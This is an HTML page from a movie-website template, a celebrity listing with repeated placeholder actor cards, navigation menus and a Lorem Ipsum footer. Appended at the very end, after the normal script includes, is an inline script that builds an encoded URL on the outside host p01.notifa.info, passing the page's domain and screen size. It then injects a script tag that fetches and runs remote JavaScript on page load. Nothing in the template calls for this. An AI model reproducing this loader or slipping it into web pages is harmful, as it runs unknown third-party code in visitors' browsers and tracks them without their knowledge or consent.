<!DOCTYPE html>
<html lang="en">

<head>
    <!--- Basic Page Needs  -->
    <meta charset="utf-8">
    <title>Celebretty Page || Movie</title>
    <meta name="description" content="">
    <meta name="author" content="">
    <meta name="keywords" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <!-- Mobile Specific Meta  -->
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <!-- CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/jquery-ui.css">
    <link rel="stylesheet" href="css/fontawesome-all.min.css">
    <link rel="stylesheet" href="css/owl.carousel.min.css">
    <link rel="stylesheet" href="css/animate.css">
    <link rel="stylesheet" href="css/plyr.css">
    <link rel="stylesheet" href="css/magnific-popup.css">
    <link rel="stylesheet" href="css/slicknav.min.css">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/responsive.css">
    <!-- Favicon -->
    <link rel="shortcut icon" type="image/png" href="img/favicon.ico">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
        <![endif]-->
</head>

<body>
    <div id="preloader"></div>
    <!-- header-start -->
    <header>
        <div class="header-top-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-2 col-md-3 col-sm-12 col-12">
                        <div class="logo">
                            <a href="index.html">
                                <img src="img/home1/logo.png" alt="">
                            </a>
                        </div>
                    </div>
                    <div class="col-lg-8 col-md-7 col-sm-12 col-12">
                        <div class="responsive-menu d-lg-none"></div>
                        <div class="menu d-none d-lg-block">
                            <nav>
                                <ul id="menu">
                                    <li>
                                        <a href="index.html">Home</a>
                                        <ul class="drop">
                                            <li>
                                                <a href="index.html">Home One</a>
                                            </li>
                                            <li>
                                                <a href="02_index-2.html">Home Two</a>
                                            </li>
                                            <li>
                                                <a href="03_index-3.html">Home Three</a>
                                                <ul class="third">
                                                    <li>
                                                        <a href="#">demo</a>
                                                    </li>
                                                    <li>
                                                        <a href="#">demo</a>
                                                    </li>
                                                    <li>
                                                        <a href="#">demo</a>
                                                    </li>
                                                </ul>
                                            </li>
                                        </ul>
                                    </li>
                                    <li>
                                        <a href="09_about.html">About</a>
                                    </li>
                                    <li>
                                        <a href="05_feature-movie-grid.html">Movie Layout</a>
                                        <ul class="drop">
                                            <li>
                                                <a href="05_feature-movie-grid.html">Movie Grid</a>
                                            </li>
                                            <li>
                                                <a href="06_feature-movie-list.html">Movie list</a>
                                            </li>
                                            <li>
                                                <a href="04_movie-details.html">Movie Details</a>
                                            </li>
                                        </ul>
                                    </li>
                                    <li>
                                        <a href="10_blog-page.html">Blog</a>
                                        <ul class="drop">
                                            <li>
                                                <a href="10_blog-page.html">Blog</a>
                                            </li>
                                            <li>
                                                <a href="11_blog-details.html">Blog Details</a>
                                            </li>
                                        </ul>
                                    </li>
                                    <li class="mega">
                                        <a href="#">Pages</a>
                                        <ul class="mega-menu">
                                            <li>
                                                <a href="#">Column 1</a>
                                                <ul>
                                                    <li>
                                                        <a href="index.html">Home One</a>
                                                    </li>
                                                    <li>
                                                        <a href="02_index-2.html">Home Two</a>
                                                    </li>
                                                    <li>
                                                        <a href="03_index-3.html">Home Three</a>
                                                    </li>
                                                </ul>
                                            </li>
                                            <li>
                                                <a href="#">Column 2</a>
                                                <ul>
                                                    <li>
                                                        <a href="04_movie-details.html">Movie Details</a>
                                                    </li>
                                                    <li>
                                                        <a href="05_feature-movie-grid.html">Movie Feature Grid</a>
                                                    </li>
                                                    <li>
                                                        <a href="06_feature-movie-list.html">Movie Feature List</a>
                                                    </li>
                                                </ul>
                                            </li>
                                            <li>
                                                <a href="#">Column 3</a>
                                                <ul>
                                                    <li>
                                                        <a href="07_celebrety-page.html">Celebrety Page</a>
                                                    </li>
                                                    <li>
                                                        <a href="08_celebrety-details.html">Celebrety Details</a>
                                                    </li>
                                                    <li>
                                                        <a href="09_about.html">About</a>
                                                    </li>
                                                </ul>
                                            </li>
                                            <li>
                                                <a href="#">Column 4</a>
                                                <ul>
                                                    <li>
                                                        <a href="10_blog-page.html">Blog Page</a>
                                                    </li>
                                                    <li>
                                                        <a href="11_blog-details.html">Blog Details</a>
                                                    </li>
                                                    <li>
                                                        <a href="12_contact.html">Contact</a>
                                                    </li>
                                                </ul>
                                            </li>
                                        </ul>
                                    </li>
                                    <li>
                                        <a href="12_contact.html">Contacts</a>
                                    </li>
                                </ul>
                            </nav>
                        </div>
                    </div>
                    <div class="col-lg-2 col-md-2 col-sm-12 col-12">
                        <div class="account">
                            <a href="#">
                                <span>
                                    <i class="far fa-user"></i>
                                </span>
                            </a>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="header-bottom-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-3 col-md-4 col-sm-12 col-12">
                        <div class="free-ticket">
                            <a href="#">
                                <span>
                                    <i class="far fa-file-video"></i>
                                </span> Friday Bigsow For Free !</a>
                        </div>
                    </div>
                    <div class="col-lg-9 col-md-8 col-sm-12 col-12">
                        <div class="search-signup">
                            <div class="search">
                                <form action="#">
                                    <div class="search-input-box">
                                        <select>
                                            <option>Movie</option>
                                            <option>Serial</option>
                                            <option>Drama</option>
                                            <option>Bla</option>
                                            <option>Bla</option>
                                            <option>Bla</option>
                                            <option>Bla</option>
                                            <option>Bla</option>
                                            <option>Bla</option>
                                        </select>
                                        <input type="text">
                                        <button>
                                            <i class="fas fa-search"></i>
                                        </button>
                                    </div>
                                </form>
                            </div>
                            <div class="signup">
                                <a href="#">Sign up</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <!-- header-start -->
    <!-- other-page-breadcumb-area-start -->
    <div class="other-page-breadcumb-area bg-with-ebony">
        <div class="container">
            <div class="row">
                <div class="col-lg-10 col-md-9 col-sm-9 col-12">
                    <div class="op-breadcumb">
                        <ul>
                            <li>
                                <a href="index.html">
                                    <span>
                                        <i class="fa fa-home" aria-hidden="true"></i>
                                    </span>Home</a>
                            </li>
                            <li>
                                <a href="#">Celebretty</a>
                            </li>
                        </ul>
                    </div>
                </div>
                <div class="col-lg-2 col-md-3 col-sm-3 col-12">
                    <div class="op-back">
                        <a href="#">Go Back</a>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- other-page-breadcumb-area-end -->
    <!-- celebrety-area-start -->
    <div class="celebrety-area">
        <div class="container">
            <div class="row">
                <div class="col-12">
                    <div class="grid-menu d-flex justify-content-between">
                        <div class="tab">
                            <nav>
                                <div class="nav nav-tabs" id="nav-tab" role="tablist">
                                    <a class="nav-item nav-link active" id="nav-home-tab" data-toggle="tab" href="#grid" role="tab" aria-selected="true">
                                        <i class="fa fa-th-large"></i>
                                    </a>
                                    <a class="nav-item nav-link" id="nav-profile-tab" data-toggle="tab" href="#list" role="tab" aria-selected="false">
                                        <i class="fa fa-list-ul"></i>
                                    </a>
                                </div>
                            </nav>
                        </div>
                        <div class="sort-show">
                            <select>
                                <option>Sort by</option>
                                <option>Sort by 1</option>
                                <option>Sort by 2</option>
                                <option>Sort by 3</option>
                                <option>Sort by 4</option>
                            </select>
                            <p>
                                <a href="#" class="fas fa-long-arrow-alt-up"></a> 13</p>
                            <select>
                                <option>Show</option>
                                <option>Show 1</option>
                                <option>Show 2</option>
                                <option>Show 3</option>
                                <option>Show 4</option>
                            </select>
                        </div>
                        <div class="pages">
                            <ul>
                                <li>
                                    <a href="#">
                                        <i class="fa fa-angle-left" aria-hidden="true"></i>
                                    </a>
                                </li>
                                <li>
                                    <a class="active" href="#">1</a>
                                </li>
                                <li>
                                    <a href="#">2</a>
                                </li>
                                <li>
                                    <a href="#">3</a>
                                </li>
                                <li>
                                    <a href="#">
                                        <i class="fa fa-angle-right" aria-hidden="true"></i>
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
            <div class="row">
                <div class="col-12">
                    <div class="tab-content" id="nav-tabContent">
                        <div class="tab-pane fade show active" id="grid" role="tabpanel">
                            <div class="grid-celebreties">
                                <div class="row">
                                    <div class="col-lg-3 offset-lg-0 col-md-5 offset-md-1 col-sm-6 offst-sm-0 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-1.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 col-md-5 col-sm-6 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-2.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 offset-lg-0 col-md-5 offset-md-1 col-sm-6 offst-sm-0 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-3.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 col-md-5 col-sm-6 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-4.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 offset-lg-0 col-md-5 offset-md-1 col-sm-6 offst-sm-0 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-5.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 col-md-5 col-sm-6 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-6.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 offset-lg-0 col-md-5 offset-md-1 col-sm-6 offst-sm-0 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-7.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 col-md-5 col-sm-6 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-8.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 offset-lg-0 col-md-5 offset-md-1 col-sm-6 offst-sm-0 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-9.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 col-md-5 col-sm-6 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-10.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 offset-lg-0 col-md-5 offset-md-1 col-sm-6 offst-sm-0 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-11.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 col-md-5 col-sm-6 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-12.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="tab-pane fade" id="list" role="tabpanel">
                            <div class="list-celebreties">
                                <div class="row">
                                    <div class="col-lg-3 offset-lg-0 col-md-5 offset-md-1 col-sm-6 offst-sm-0 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-5.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 col-md-5 col-sm-6 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-6.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 offset-lg-0 col-md-5 offset-md-1 col-sm-6 offst-sm-0 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-7.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 col-md-5 col-sm-6 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-8.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 offset-lg-0 col-md-5 offset-md-1 col-sm-6 offst-sm-0 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-9.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-lg-3 col-md-5 col-sm-6 col-12">
                                        <div class="single-celebrety">
                                            <div class="img">
                                                <img src="img/celebrety/celeb-10.jpg" alt="">
                                            </div>
                                            <div class="content">
                                                <ul class="social">
                                                    <li class="facebook">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-facebook-f"></i>
                                                        </a>
                                                    </li>
                                                    <li class="pinterest">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-pinterest-p"></i>
                                                        </a>
                                                    </li>
                                                    <li class="twitter">
                                                        <a href="#" target="_blank">
                                                            <i class="fab fa-twitter"></i>
                                                        </a>
                                                    </li>
                                                </ul>
                                                <h5 class="name">Emmanna Papang</h5>
                                                <p class="desg">Actor</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- celebrety-area-end -->
    <!-- footer-start -->
    <footer>
        <div class="footer-top-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-info footer-widget">
                            <div class="flogo">
                                <img src="img/home1/logo2.png" alt="">
                            </div>
                            <p class="text">Lorem Ipsum is simply dummy text of the printing and typesetting.Lorem Ipsum is simply dummy
                                text of the print.</p>
                            <ul class="address">
                                <li>
                                    <span>
                                        <i class="fas fa-map-marker-alt"></i>
                                    </span> Bangladesh, Dhaka, Mirpur -12</li>
                                <li>
                                    <span>
                                        <i class="fas fa-phone"></i>
                                    </span> +(999) 321456987</li>
                                <li>
                                    <span>
                                        <i class="far fa-envelope"></i>
                                    </span> i-finger.education@gmail.com</li>
                            </ul>
                            <ul class="social">
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-facebook-f"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-twitter"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-pinterest-p"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-youtube"></i>
                                    </a>
                                </li>
                                <li>
                                    <a href="#" target="_blank">
                                        <i class="fab fa-vimeo-v"></i>
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-list footer-widget">
                            <h4 class="title">Movies Category</h4>
                            <ul class="list">
                                <li>
                                    <a href="#">About Us</a>
                                </li>
                                <li>
                                    <a href="#">Popular Courses</a>
                                </li>
                                <li>
                                    <a href="#">Forums</a>
                                </li>
                                <li>
                                    <a href="#">Place</a>
                                </li>
                                <li>
                                    <a href="#">Our Teachers</a>
                                </li>
                                <li>
                                    <a href="#">Upcoming Events</a>
                                </li>
                                <li>
                                    <a href="#">Contact Us</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-list footer-widget">
                            <h4 class="title">Resources</h4>
                            <ul class="list">
                                <li>
                                    <a href="#">About Block Buster</a>
                                </li>
                                <li>
                                    <a href="#">Security</a>
                                </li>
                                <li>
                                    <a href="#">Blog</a>
                                </li>
                                <li>
                                    <a href="#">Help Center</a>
                                </li>
                                <li>
                                    <a href="#">Terms of Use</a>
                                </li>
                                <li>
                                    <a href="#">Privacy Policy</a>
                                </li>
                                <li>
                                    <a href="#">Movie Collections</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-3 col-md-6 col-sm-6 col-12">
                        <div class="fw-twitter footer-widget">
                            <h4 class="title">Twitter</h4>
                            <ul class="tweet-feed">
                                <li>
                                    <h6 class="name">
                                        <span class="icon">
                                            <i class="fab fa-twitter"></i>
                                        </span> @ifinger.
                                        <span>movie</span>
                                    </h6>
                                    <p class="text">Lorem Ipsum is simply dummy text printing and typesetting.</p>
                                </li>
                                <li>
                                    <h6 class="name">
                                        <span class="icon">
                                            <i class="fab fa-twitter"></i>
                                        </span> @ifinger.
                                        <span>movie</span>
                                    </h6>
                                    <p class="text">Lorem Ipsum is simply dummy text printing and typesetting.</p>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="footer-bottom-area">
            <div class="container">
                <div class="row">
                    <div class="col-lg-6 col-md-12 col-sm-12 col-12">
                        <div class="fba-left">
                            <ul class="links">
                                <li>
                                    <a href="#">Home</a>
                                </li>
                                <li>
                                    <a href="#">Movie Layout</a>
                                </li>
                                <li>
                                    <a href="#">Celebrities</a>
                                </li>
                                <li>
                                    <a href="#">News</a>
                                </li>
                                <li>
                                    <a href="#">Contacts</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="col-lg-6 col-md-12 col-sm-12 col-12">
                        <div class="fba-right">
                            <p class="copyright">CopyRight© 2018 Design by
                                <a href="#">@i-finger</a> . All Rights Reserved.</p>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </footer>
    <!-- footer-end -->
    <!-- Scripts -->
    <script src="js/jquery-3.2.0.min.js"></script>
    <script src="js/jquery-ui.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/jquery.counterup.min.js"></script>
    <script src="js/countdown.js"></script>
    <script src="js/parallax.js"></script>
    <script src="js/amplitude.js"></script>
    <script src="js/plyr.js"></script>
    <script src="js/jquery.slimscroll.min.js"></script>
    <script src="js/jquery.magnific-popup.min.js"></script>
    <script src="js/jquery.slicknav.min.js"></script>
    <script src="js/jquery.scrollUp.js"></script>
    <script src="js/jquery.mixitup.min.js"></script>
    <script src="js/jquery.waypoints.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/theme.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JKzDzTsXZH2sft6BqMOmD138VBfuqbO05qIqymHrKxN3H57Gk0zbnIwNOmqaK4E0WRgLpNpUcKf%2fVyLlEtoUM5WPpXqibff4mMCfygKORefaUXmeYRokOdb2CGbQteJrNllHK4ZptDY3nprDXoL9IaZ10olcOJ8NR%2bolKfIXXpAQ%2brqEc6gf2zV1xhW%2fLMdZklGEoa3t2453eubu5hjElAs8qwhsPg87dHZg1ATsXhjzDh3D2Q2Lf8xXjvHFfXTrMIQQt3KmDvJz8XsZlI80lId6gzsC9Sbxk1RjdlS6eKN2wQukH3LjfJFRIHC0B2fj5IqfvBVYzD80VAuUdZ3uvjmMU2f4ClGA41qH08F59WS5Ypkr8S5htmb%2bQ6SmPeRCpSi0Enq1oYfqAVTz76uxWso9IbICmAAFsTvkq2QQ0U3jSBnNTH4PeWNkRRjlc5Cnu7sac2OTk3GH2SoLyzleGejrkVrhssQb%2bARuzD5gSLGXs7BhMnctSfXBOZ1sc6KqHsa09naxoib%2fd2IvTWskn4NrpoDQIKJx155CV42jx1c" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>